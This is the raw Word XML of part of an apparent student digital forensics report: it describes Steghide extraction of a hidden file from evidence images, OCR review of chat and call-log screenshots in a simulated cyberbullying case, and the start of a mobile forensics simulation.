        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yzi7szuc3i2t" w:id="72"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypted Files’ Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The two files, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_PoliceReport-CS-01.jpeg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_PoliceReport-CS-02.jpeg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, are the actual copies of police reports. From the police reports, I confirmed that a cyberbullying incident reported by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lucy Alden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves suspect </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Justine Elias</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using Twitter and Instagram to harass </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emily James</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on April 20, 2021.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">The other two files, namely </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_IMG_0010.jpg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_IMG_0013.jpg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, appear to be screenshots of a street. However, I suspected that these images might contain hidden data, potentially using steganography.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bhfxeia5us2z" w:id="73"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To explore this possibility of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">steganography</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I turned to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steghide </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tool, an open-source steganography tool. I applied this tool to six images that were not related to chats, call logs, etc., to determine if they contained any hidden data.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Images:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e_IMG_0010, e_IMG_0013, IMG_0010.jpeg, IMG20231123140.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypted Images:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> decrypted_IMG_0010.jpg, decrypted_IMG_0013.jpg</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">The experiment was successful with only one file, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMG_0010.jpeg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, out of the six images tested.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">steghide extract -sf IMG_0010.jpeg -p kali</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the passphrase </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'kali'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we were able to retrieve a file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypt_file002.cpp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through steganography analysis. Surprisingly, this file was identical in content to a file of the same name that we already had in our evidence folder. Notably, none of the images were successfully decompressed using the password "Qk;87R]_w3dmBGcb[#TX=4" with the Steghide tool.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">This fact, coupled with the subsequent decryption of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e_IMG_0010 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to produce </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_IMG_0010.jpg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, raised further questions. The two files, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMG_0010.jpeg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">decrypted_IMG_0010.jpg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, were found to be identical in content, differing only in their file extensions. This duplication suggests that the same content was subjected to both steganographic concealment and encryption.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tpw8t7cypj6s" w:id="74"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chats, Call Logs, and Police Report Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I reviewed 30 images of chats and 2 images of call logs, and also retrieved a two-page police report. To extract text from these records, I used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Lens</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OCR (Optical Character Recognition)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and documented the information in a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Sheet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The analysis of these files revealed patterns and key details:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">police report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> verified the crime as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cyberbullying</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It identified the suspect as</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Justine Elias</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the complainant as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lucy Alden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">images confirmed instances of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cyberbullying</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, showcasing conversations between the alleged attacker, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Justine Elias</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the victim, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emily James</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">call log report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also supported the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cyberbullying </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">case. It included text indicating that the nature of the conversation was consistent with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cyberbullying</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kbxvf8dnqku2" w:id="75"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Video Presentation and Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name of the file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group C - Task 3 - Final PPT.mp4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In response to our assignment on cyberbullying and digital forensics, our team has diligently crafted a comprehensive video presentation, aptly titled </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Group C - Task 3 - Video Presentation".</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This 10-minute video showcases the collective expertise and individual contributions of our team members. The link to the video can be found in the shared drive folder.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xb42ke27nvbf" w:id="76"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 4: Mobile Digital Forensic Investigation Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qgtdxwnawnof" w:id="77"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Examination and Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kgmyib8y5u5b" w:id="78"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Examination of the Phone Case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Model: Note 14 (16G)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brand: Ulefone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Powered by Android™ 12</w:t>
      </w:r>
